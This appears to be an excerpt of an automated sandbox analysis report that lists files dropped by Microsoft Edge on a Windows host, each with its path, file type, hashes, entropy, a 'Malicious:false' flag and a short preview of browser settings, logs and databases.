                                                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@................T...T..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".yabwnk20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.........m...... .2........

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.132041621771752
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                                                                                                                                                                                                                    MD5:845CFA59D6B52BD2E8C24AC83A335C66
                                                                                                                                                                                                                                                                                    SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
                                                                                                                                                                                                                                                                                    SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
                                                                                                                                                                                                                                                                                    SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1a12cae6-0f02-4070-acc1-596844db3430.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\53fadcb9-f27f-4514-8742-f56d545cb736.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):25012
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.567446526186164
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:c64Tl7WPl1fwH8F1+UoAYDCx9Tuqh0VfUC9xbog/OV8JYSLrwHqpVtuu:c64Tl7WPl1fwHu1jadeSAstB
                                                                                                                                                                                                                                                                                    MD5:F669505FCC3009C42D05E9A02BD3ABC6
                                                                                                                                                                                                                                                                                    SHA1:46E91F55009D6AD03AE9CDC1DE4C19B8D1F14DA9
                                                                                                                                                                                                                                                                                    SHA-256:5F47D70862C4CF14B3A66990964568E1AC77E79DB07C68D11F1021B7557CBE83
                                                                                                                                                                                                                                                                                    SHA-512:28748644903D7720E9189DB86E06ACDAEC4FA6FCA08B97F795B47C78D9ADE822BBC4FC32DCA9BCA3F7C42F403993CDD0623253E0E90B398B8B1A80AE488BFDCD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379780831720600","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379780831720600","location":5,"ma

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\61f61843-edc2-48c7-8fb6-47b897dfb349.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40504
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.561061268744564
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:cvGTbN7pLGLhp7WPl1fFH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVnoKJY5Lrw+Gxcm:cvGTb7chp7WPl1fFHu1jaOoKe5A+Gx8U
                                                                                                                                                                                                                                                                                    MD5:99EC0ED681633C22395DF0FAECA9B8C8
                                                                                                                                                                                                                                                                                    SHA1:5C19DD748F04C37BAB7667FDE610C75D62DF18F7
                                                                                                                                                                                                                                                                                    SHA-256:48C5C8503A31F422426305BC45EFC4BDA870B371FDF38541793CD92C9E8A027F
                                                                                                                                                                                                                                                                                    SHA-512:5F890B754B3621672EFE359500E9721AC365E97309989E9D681D0AC3C3C5E03EC19768207513CFAA655ABAA017B1A58284C54985AB72C6999BD3D6D525BEB585
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379780831720600","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379780831720600","location":5,"ma

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6d4ecc2d-82ed-48b8-8605-a534cd846610.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                    MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                    SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                    SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                    SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):307
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.239840152279541
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:iQVIgHM1923oH+Tcwtp3hBtB2KLlguLcjIq2P923oH+Tcwtp3hBWsIFUv:iyhYebp3dFLauLxv4Yebp3eFUv
                                                                                                                                                                                                                                                                                    MD5:A0D850A501C1674BC6A96EC8175B198C
                                                                                                                                                                                                                                                                                    SHA1:B57C555FEA867FFC068B64EF87A8D1A2C7E3F1D2
                                                                                                                                                                                                                                                                                    SHA-256:868F2F6FF26B506172D2C328B1F0B3661D2D0379D1100AC871F9EFA08862A3B3
                                                                                                                                                                                                                                                                                    SHA-512:2FE3B21FC8B2FEFE9B022938415144AC16164FB7410411FE979A3802D5BAE464FF18114387741A17595BF22687A51EFC165047891B1D91A8E36DF5C96DBD59A3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:16.905 ff4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/27-08:47:17.005 ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):2163821
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.222867489346783
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24576:v+/PN8FffI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8tfx2mjF
                                                                                                                                                                                                                                                                                    MD5:16043C38E88882D86BE71702F90DD53F
                                                                                                                                                                                                                                                                                    SHA1:E8EF0CB4D0C1829DFEA7037AE8DC32E18EBCC998
                                                                                                                                                                                                                                                                                    SHA-256:30E06B7FA45776438B257A0C2C420FC4ABDAD4A6A7C520DDB071F2810B78EC1D
                                                                                                                                                                                                                                                                                    SHA-512:16A25BB12867816D8A017225EA81729E370F792EA434BF506954F4C0A3D90ED1BF1268CA7D6891C00916F011391F027333D6CA33BC7C6C478A393DFC259F3E41
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.167666127854885
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:iQXoR+q2P923oH+Tcwt9Eh1tIFUt8dQXNAZmw+dQWVkwO923oH+Tcwt9Eh15LJ:iC5v4Yeb9Eh16FUt8dCNA/+dZ5LYeb9O
                                                                                                                                                                                                                                                                                    MD5:E44B026F1437D09282607308D0DCFDC8
                                                                                                                                                                                                                                                                                    SHA1:E0960B9EB36187483023AE2CF70B563F435C6516
                                                                                                                                                                                                                                                                                    SHA-256:40AB781F8039528345F8825A484A41374E4E1F155240AC0B056DB604BB2ED53D
                                                                                                                                                                                                                                                                                    SHA-512:927CA492938453BB39932CA3035D6028063EF727057713321994A4B575795C27E38B5102F401344BBCE56338CDCAE734E44A884375B68C02083E961464FB2722
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:16.924 1c18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-08:47:16.926 1c18 Recovering log #3.2024/12/27-08:47:16.931 1c18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.167666127854885
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:iQXoR+q2P923oH+Tcwt9Eh1tIFUt8dQXNAZmw+dQWVkwO923oH+Tcwt9Eh15LJ:iC5v4Yeb9Eh16FUt8dCNA/+dZ5LYeb9O
                                                                                                                                                                                                                                                                                    MD5:E44B026F1437D09282607308D0DCFDC8
                                                                                                                                                                                                                                                                                    SHA1:E0960B9EB36187483023AE2CF70B563F435C6516
                                                                                                                                                                                                                                                                                    SHA-256:40AB781F8039528345F8825A484A41374E4E1F155240AC0B056DB604BB2ED53D
                                                                                                                                                                                                                                                                                    SHA-512:927CA492938453BB39932CA3035D6028063EF727057713321994A4B575795C27E38B5102F401344BBCE56338CDCAE734E44A884375B68C02083E961464FB2722
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:16.924 1c18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-08:47:16.926 1c18 Recovering log #3.2024/12/27-08:47:16.931 1c18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.46306724907951013
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu53UL:TouQq3qh7z3bY2LNW9WMcUvBuBa
                                                                                                                                                                                                                                                                                    MD5:144094C0D6BE72C76193B2D422DED66D
                                                                                                                                                                                                                                                                                    SHA1:AF6A78510A9615BA2A7F6D92FE7BBD98CD41339B
                                                                                                                                                                                                                                                                                    SHA-256:4AD94D0464D993C930C73DCA86C5B962D853716F18A7F4BB2FAB78A4F8A9EA45
                                                                                                                                                                                                                                                                                    SHA-512:90A3EEDE7D68442726A0091FEC6DE67FFBA1C5DC618DB1D24958E5DBC26FC1EBAD09A96DCF932C5C8017FD9B0ADFE049324477CDE558723821FEF1B08645E579
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                    MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                    SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                    SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                    SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):348
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.189112330006538
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLtDN+q2P923oH+TcwtnG2tMsIFUt8doL6IZZmw+doLRKVkwO923oH+TcwtnG2b:iCDIv4Yebn9GFUt8doZ/+d/5LYebn95J
                                                                                                                                                                                                                                                                                    MD5:EBE61D24F89365B0BB6957EF81F6CFB6
                                                                                                                                                                                                                                                                                    SHA1:5D1CAA8B6BA2A894DABCBEA03944C1C8286E3ED2
                                                                                                                                                                                                                                                                                    SHA-256:64377E47BE2F0A4EDFDFDD4ADCAD5021767B8E5F659E3FB3A97CAFFC663833D3
                                                                                                                                                                                                                                                                                    SHA-512:49C19DEBFC3F1D55F567B8B0D4598569057A23EDC69A4C4225BAD1CD60430B140C91968599B65EFE68ADC8A37C0C6A3B81681549AAD5B42738BFAA6443611D49
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.845 17e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-08:47:11.847 17e8 Recovering log #3.2024/12/27-08:47:11.848 17e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):348
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.189112330006538
                                                                                                                                                                                                                                                                                    Encrypted:false
